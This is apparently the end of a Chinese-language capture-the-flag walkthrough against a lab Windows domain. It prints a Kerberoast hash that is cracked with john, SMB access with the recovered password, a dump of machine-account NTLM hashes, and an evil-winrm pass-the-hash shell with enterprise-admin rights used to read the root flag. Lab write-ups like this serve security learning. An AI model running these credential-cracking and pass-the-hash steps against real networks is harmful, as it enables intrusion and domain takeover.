$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$HTTP/WebServer*$a8a4ea82594dfa2f43915f0e31ace64d$563968fbcf0c5af63ec5000b270a83178254a0f2069c31951d8bd5a5214dce8d70e718db1b91193b94b200c450a1a1e86a1b3a435c7ddf4ac6b8516b151ad6fe5b5cadfe789ea09bc691e5bb8ec84580a6de22a265fee147d14980b1e752d19eba428c392a2bc6ece62f23357faa5162fecd68f0905f8f7f4fff2d120da7ebe91b4a50c4f0c99fc7195c8706870c406d3ac1b402d9c4e88b6b6385441169752771f604ba2fe5bdd30a353d527fe4e603c01194d614d24efde79810f6d9b3690924662f4f8f92d73469bddc7cc9dcfcab27e237a03a9edb1695a3cd61ce582710ed17ebf2b7da03f01f2a7c856c9dbfb7976b9321198e97057fe5a1ffe89f20b5805e2e4b5e3509bc50eff404a148c4317610cfd62f3f7a879fc081ecfd9d208e34d0efbc74c4733f411d04ea61259af26f8beee518fafc13420057a4521b0790952708d8d0263f067263a9fbbbd423fa7c7e73bea0e3ea4941236b55abd439fd76de50cb812129580949d75fb4fc821b36db63df59c569217fca0fdccba9d2d0ef5be3be137e3e2121503ee18e618cdb9c55a144b0b338bc5eaf5eeb5810690c5735fa3dd7f76d4b655afae087f2deccd52f57a3700445391f53bd2dd18d710f00402b7bbdedc1290e39ad634a1c1247565c4a6b8311a311c75ff46f686a231cc6ece228a0a69082a18acf9d9956931f3c709fae86dc962437c280b8c1715f413cc941ea8e08f864cdefdcdb9021e4e17d9e5fb0d74362a905a770d7788e628c75811e290afe2a9986d6b5a5d1113823c27579ec0cf4342bb05a9c63aad389d8b2105ea3d8ecace920adfb67ab8eff17819a0d624c8afe6431fda6e3d7c0af6f72e75a41c64ebb21caca095460c40ec3b56edd171e2a8db507b5c556e5084f0997f60f63f86f7191bc4276e528f5d1aef93ece516d39805ea8ebc25740eccc5c54ce63631a2dda2daa7a848d41a499149eb40e95b63cefa93147450997c82c224ece59f275b5c2e6260a5650302f5ea83801a9a2e3cf37841f97c82edeec629c08d460c5a57b1cc5b5727ef0aa9c2181cb30c2ea74ed7d146e88932888968b95cea497101ac9b2a0dc955ec27cb6f7b4d52b770227b0dd8668dd644e40c4baa3fe999824717fe1e016b7ceb709d4a71ada4339bf4612f1c9062991067a0690494f9d7e68a19a38d0266b14e4a70de72f02ba7c6a73895e6278edcd2096a09aa4abc197c357f546594be6d8284a5e88b2bd03a257cfa7fcad0eed13459e1287999dba8a9d1af63e684d01302a269c77b8c0f19e96e5be56e9efa7569c72609a0e3a2884bf635453f6e237a0d9bde8e1d088e9d472995e16ecf39b909afb28d631cfea9676f0e00d5f98df009365f9e0b96aef92421bc44503625d9d0c5a8409f1b6d2af5c4f047b056b877a6d12c39a460b62463c10a7f3f2cd7e4c7276973a6869f977d49e1370ce555357477658hash保存用john跑一下
> john aa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!! (?)
1g 0:00:01:11 DONE (2024-07-16 05:58) 0.01403g/s 201259p/s 955614c/s 955614C/s 1..1cm
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 拿到一个密码Password123!!,而且是file_svc的密码,那么尝试访问目录
PTH攻击
> smbclient //192.168.56.128/backup -U file_svc
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 18 01:41:17 2024
.. DR 0 Tue Jun 18 01:44:56 2024
backup_extract.txt A 892 Mon Jun 17 16:41:05 2024
12942591 blocks of size 4096. 10794376 blocks available> cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::拿到了一些服务的hash,尝试使用哈希传递攻击
> evil-winrm -i 192.168.56.128 -u FileServer$ -H e41da7e79a4c76dbd9cf79d1cb325559
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami
soupedecode\fileserver$拿到了shell
*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers Group S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.可以看到FileServer属于管理员组,直接能读Administrator下面的root flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a9564*********ad5ec60a